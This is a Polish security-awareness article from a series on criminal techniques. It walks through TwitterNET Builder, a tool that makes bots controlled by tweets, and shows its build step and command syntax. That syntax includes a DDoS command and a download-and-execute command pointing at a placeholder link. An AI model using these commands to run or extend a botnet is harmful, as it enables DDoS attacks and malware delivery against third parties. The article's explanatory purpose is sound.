HARD CORE SECURITY LAB

W ramach cyklu Tak robią to komputerowi przestępcy... omówiliśmy już przykładowy atak z wykorzystaniem specjalnie spreparowanej strony WWW, przykładowy atak phishingowy, jeden z popularnych sposobów na przejęcie cudzego konta e-mail oraz metodę pozwalającą na dodanie złośliwego kodu do dowolnego pliku EXE. Dziś natomiast zapoznamy się ze sposobem, w jaki komputerowi przestępcy mogą w prosty sposób utworzyć własny botnet sterowany za pomocą poleceń wydawanych za pośrednictwem serwisu Twitter.

Jak wiemy, komputerowi przestępcy odpowiedzialni za większość internetowych ataków, które na co dzień zagrażają internautom oraz serwerom internetowym, zazwyczaj nie zaprzątają sobie głowy tworzeniem własnych narzędzi. Okazało się bowiem, że crackerom bardziej opłaca się zakupić od innych przestępców gotowe zestawy lub skorzystać z narzędzi powszechnie dostępnych, niż własnoręcznie zajmować się żmudnym kodowaniem i testowaniem exploitów i wszelkich innych programów tworzonych z myślą o przeprowadzaniu ataków.

Okazuje się, że przestępcy chcący utworzyć własną sieć komputerów zombie zdalnie sterowanych za pomocą komend publikowanych w popularnym serwisie Twitter, również mogą skorzystać z gotowych rozwiązań. Wysłanie pojedynczego ćwierknięcia wystarczy, by wszystkie kontrolowane przez crackera boty rozpoczęły atak typu DDoS (ang. Distributed Denial of Service) na dowolnie wybraną witrynę internetową. Do stworzenia tego typu struktury, może posłużyć przykładowo odkryte niedawno przez specjalistów z firmy Sunbelt narzędzie TwitterNET Builder.

TwitterNET Builder pozwala na utworzenie złośliwego pliku wykonywalnego, który w wyniku ataku typu drive-by download (z wykorzystaniem złośliwej witryny wyposażonej w exploit pack) jest w stanie infekować komputery internautów. W wyniku infekcji, komputer staje się częścią botnetu, czekając na polecenia z centrum sterowania (ang. command and control centre), którym jest w tym wypadku... konto w serwisie Twitter. W szczegółach wygląda to następująco.

Po uruchomienie programu TwitterNET Builder wystarczy tylko wprowadzić nazwę naszego konta w serwisie Twitter, które będzie służyło do sterowania botnetem i nacisnąć przycisk Build:
Po chwili wygenerowany zostanie plik wykonywalny zdolny do infekowania internautów i uruchamiający w ich systemie operacyjnym program oczekujący i wykonujący polecenia publikowane w ramach wcześniej wprowadzonego profilu w serwisie Twitter.

Tak wygląda przykładowo polecenie odwiedzenia strony Google.com (1 oznacza otwarcie okna przeglądarki, 0 oznacza wykonanie wizyty niewidocznej dla użytkownika zarażonego komputera):
Pozostały komendy wyglądają następująco:

• .DDOS*IP*PORT (rozpoczęcie ataku DDOS),
• .SAY* (komunikat głosowy utworzony za pomocą syntezatora mowy, świetna metoda na wprawienie w osłupienie użytkownika zarażonego komputera),
• .DOWNLOAD*link.com/file.exe* (pobranie pliku, dodanie przełącznika 1 powoduje dodatkowo jego wykonanie po pobraniu).
• .STOP (wstrzymanie wszystkich aktualnych działań wykonywanych przez wszystkie boty).
• .REMOVEALL (usunięcie kanału komunikacyjnego pomiędzy kontem w Twietterze a botami).